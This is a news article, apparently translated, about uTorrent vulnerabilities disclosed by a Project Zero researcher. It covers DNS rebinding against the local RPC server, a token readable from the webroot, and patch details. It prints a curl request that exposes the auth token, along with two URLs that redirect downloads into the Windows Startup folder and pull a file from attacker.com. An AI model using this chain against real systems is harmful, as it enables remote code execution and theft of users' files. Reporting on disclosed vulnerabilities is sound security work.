Vulnerability in uTorrent Web allows you to upload an arbitrary file in the startup folder: demo

In two versions of uTorrent (under Windows and in the web version of uTorrent Web) several dangerous vulnerabilities have been discovered that are easy to exploit. At the same time, they allow you to run arbitrary code on a machine running uTorrent (web version); get access to downloaded files, including copy them, view download history (web version and Windows).

Hacking is possible only if uTorrent works with default settings, namely with HTTP RPC server on port 10000 (uTorrent Classic) or 19575 (web version of uTorrent) with the activated handler /proxy/ (it is activated by default).

Bugs found the hacker Tavis Ormandy from Project Zero at Google. He disclosed information in the Chromium bug tracker on January 31, 2018 (90 days after he informed the developers about it).

As Tavis writes, any website can interact with the above RPC servers through the XMLHTTPRequest () programming interface. This API uses HTTP or HTTPS requests directly to the server and loads server response data directly into the calling script. The interface allows you to perform HTTP requests to the server without reloading the page and is often used on many modern sites.
')
To hack the machine where uTorrent works, you need to lure the user to a web page where the exploit is installed. It can be absolutely any site. An exploit through DNS reassignment via XMLHTTPRequest () forces the browser to run a script accessing this RPC server.

The demo page provides examples of what actions a web site can initiate via the JSON RPC server interface on port 10000. Here, standard uTorrent commands are sent via the XMLHTTPRequest () program interface.

Tavis writes that while studying various commands of a uTorrent client, he noticed that the /proxy/ handler is active in the program with default settings, which allows a third-party site to look at the list of downloaded files and copy them. That is, by default, uTorrent allows any site to check the list of torrents you downloaded, you just need to clear one small number (sid), which is assigned to each open torrent in turn.

Ormandy made a demo page . Hacker says the demo is slow, but if you still want to see the focus, do the following:

1. Install uTorrent with default settings.
2. Add a torrent from the URL: https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent .
3. At the end of the torrent download (it is only 5 MB), go to the demo page .
4. Wait a few minutes.

( screenshot ).

In the course of studying the uTorrent program, Tavis found in it a couple more bugs and flaws: for example, an incorrect pseudo-random number generator, disabling ASLR memory protection and incorrect operation in the “guest” mode, where many functions should be disabled, but in fact they are available through same server on port 10,000.

In the web version, the vulnerability is even tougher, because there any third-party site can access the authentication token whose secret is stored in the open webroot folder (as well as settings, dumps, logs, etc.) - this surprised Tavis Ormandi very much.

$ curl -si http://localhost:19575/users.conf
HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 19:46:44 GMT
Last-Modified: Wed, 31 Jan 2018 19:37:50 GMT
Etag: "5a721b0e.92"
Content-Type: text/plain
Content-Length: 92
Connection: close
Accept-Ranges: bytes

localapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1

After receiving the secret, you can remotely change the directory for downloading and give the command to download an arbitrary file. For example, upload the malicious code to the startup folder:

http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup

http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

→ Worker exploit

Developers from BitTorrent, Inc. have already released a patch for uTorrent under Windows. So far, it is only available in the beta version of uTorrent / BitTorrent 3.5.3.44352 , which should soon be available through an automatic update mechanism. Users of uTorrent Web need to upgrade to the latest build 0.12.0.502.

uTorrent is one of the most popular torrent clients written in C ++. It has a small size and high speed with a sufficiently large functionality. The first version was released September 18, 2005. Now available in versions for all major operating systems. The number of users exceeds 100 million people. In the first versions, the author tried to make money on contextual advertising, then the program was bought by BitTorrent, which was monetized through the imposition of toolbars, adware and Yandex Browser (in the Russian version).